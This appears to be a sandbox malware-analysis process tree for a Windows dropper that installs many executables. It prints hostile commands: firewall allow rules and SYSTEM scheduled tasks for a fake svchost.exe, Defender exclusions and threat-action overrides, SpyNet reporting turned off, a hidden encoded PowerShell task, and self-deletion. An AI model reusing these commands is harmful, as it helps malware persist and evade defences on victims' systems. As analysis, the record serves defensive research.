C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5216
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
PID:5180
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵PID:2876
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5368
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FrD5sdLjLqj3n4WiM55ney2e.exe"C:\Users\Admin\Pictures\Adobe Films\FrD5sdLjLqj3n4WiM55ney2e.exe"6⤵PID:2644
-
C:\Users\Public\Videos\hgfdfds.exe"C:\Users\Public\Videos\hgfdfds.exe"7⤵PID:5980
-
-
-
C:\Users\Admin\Pictures\Adobe Films\POO8hfWi9sr7zYOacu0zmk56.exe"C:\Users\Admin\Pictures\Adobe Films\POO8hfWi9sr7zYOacu0zmk56.exe"6⤵PID:1968
-
-
C:\Users\Admin\Pictures\Adobe Films\fONrWta0pj4QFzQAuli0SHhz.exe"C:\Users\Admin\Pictures\Adobe Films\fONrWta0pj4QFzQAuli0SHhz.exe"6⤵PID:2932
-
C:\Users\Admin\AppData\Local\Temp\7zS7AB5.tmp\Install.exe.\Install.exe7⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\7zSD018.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵PID:5344
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵PID:5588
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:5696
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:3580
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵PID:4460
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵PID:6128
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵PID:644
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵PID:5272
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵PID:5772
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵PID:4484
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵PID:5604
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnTtiEtDE" /SC once /ST 04:37:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
PID:5132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnTtiEtDE"9⤵PID:188
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2bHYlcqNQQeRjwzE02NmG57J.exe"C:\Users\Admin\Pictures\Adobe Films\2bHYlcqNQQeRjwzE02NmG57J.exe"6⤵PID:1340
-
-
C:\Users\Admin\Pictures\Adobe Films\5uuYeKGOqmLcQKNQYuUY5QZT.exe"C:\Users\Admin\Pictures\Adobe Films\5uuYeKGOqmLcQKNQYuUY5QZT.exe"6⤵PID:1568
-
-
C:\Users\Admin\Pictures\Adobe Films\UxE0PlDNhTR5MmSA_V9W2kHI.exe"C:\Users\Admin\Pictures\Adobe Films\UxE0PlDNhTR5MmSA_V9W2kHI.exe"6⤵PID:1016
-
-
C:\Users\Admin\Pictures\Adobe Films\ZBWu0vUaiNqltZwYXfrmbFx_.exe"C:\Users\Admin\Pictures\Adobe Films\ZBWu0vUaiNqltZwYXfrmbFx_.exe"6⤵PID:2856
-
-
C:\Users\Admin\Pictures\Adobe Films\_I4uCB0GTOuYCtdIbbea6Mab.exe"C:\Users\Admin\Pictures\Adobe Films\_I4uCB0GTOuYCtdIbbea6Mab.exe"6⤵PID:2088
-
-
C:\Users\Admin\Pictures\Adobe Films\CWCFx2pZzV_Me71KrfEeiIza.exe"C:\Users\Admin\Pictures\Adobe Films\CWCFx2pZzV_Me71KrfEeiIza.exe"6⤵PID:1888
-
-
C:\Users\Admin\Pictures\Adobe Films\fa9NV5kDsHsXUPWw6tiwsxYX.exe"C:\Users\Admin\Pictures\Adobe Films\fa9NV5kDsHsXUPWw6tiwsxYX.exe"6⤵PID:4916
-
C:\Users\Admin\AppData\Local\Temp\1IDu5Y02vpMCU\EasyCalc License Agreement.exe"C:\Users\Admin\AppData\Local\Temp\1IDu5Y02vpMCU\EasyCalc License Agreement.exe"7⤵PID:5632
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04c109370946a.exe4⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exeThu04c109370946a.exe5⤵
- Executes dropped EXE
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\is-OHOAG.tmp\Thu04c109370946a.tmp"C:\Users\Admin\AppData\Local\Temp\is-OHOAG.tmp\Thu04c109370946a.tmp" /SL5="$201DA,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:896 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe"C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe" /SILENT7⤵
- Executes dropped EXE
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\is-0OEJ0.tmp\Thu04c109370946a.tmp"C:\Users\Admin\AppData\Local\Temp\is-0OEJ0.tmp\Thu04c109370946a.tmp" /SL5="$301DA,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5104 -
C:\Users\Admin\AppData\Local\Temp\is-5UTO8.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-5UTO8.tmp\windllhost.exe" 779⤵PID:4856
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0442fc62eeb857aca.exe4⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0442fc62eeb857aca.exeThu0442fc62eeb857aca.exe5⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0483c35fbf3ec8d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04eef50b2b35a1.exe4⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04eef50b2b35a1.exeThu04eef50b2b35a1.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1868 -s 20446⤵
- Program crash
PID:3752
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0431d38e2544.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0431d38e2544.exeThu0431d38e2544.exe5⤵
- Executes dropped EXE
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0431d38e2544.exe"C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0431d38e2544.exe" -u6⤵
- Executes dropped EXE
PID:5116
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04fb797f99fe7dae8.exe4⤵PID:1992
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04fb797f99fe7dae8.exeThu04fb797f99fe7dae8.exe5⤵
- Executes dropped EXE
- Modifies registry class
PID:2244 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\c33Ko.Cpl",6⤵PID:1676
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\c33Ko.Cpl",7⤵PID:3592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04115bb33998ce.exe4⤵PID:2552
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04115bb33998ce.exeThu04115bb33998ce.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0460219468fd5c220.exe4⤵PID:2628
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0460219468fd5c220.exeThu0460219468fd5c220.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0460219468fd5c220.exeC:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0460219468fd5c220.exe6⤵PID:1268
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu046f48ffab4707f.exe4⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu046f48ffab4707f.exeThu046f48ffab4707f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4824 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2792
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04865988bc.exe4⤵PID:2192
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04865988bc.exeThu04865988bc.exe5⤵
- Executes dropped EXE
PID:4872 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu04865988bc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04865988bc.exe" & del C:\ProgramData\*.dll & exit6⤵PID:1120
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu04865988bc.exe /f7⤵
- Kills process with taskkill
PID:2448
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:5824
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0483c35fbf3ec8d.exeThu0483c35fbf3ec8d.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:736 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2132
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3088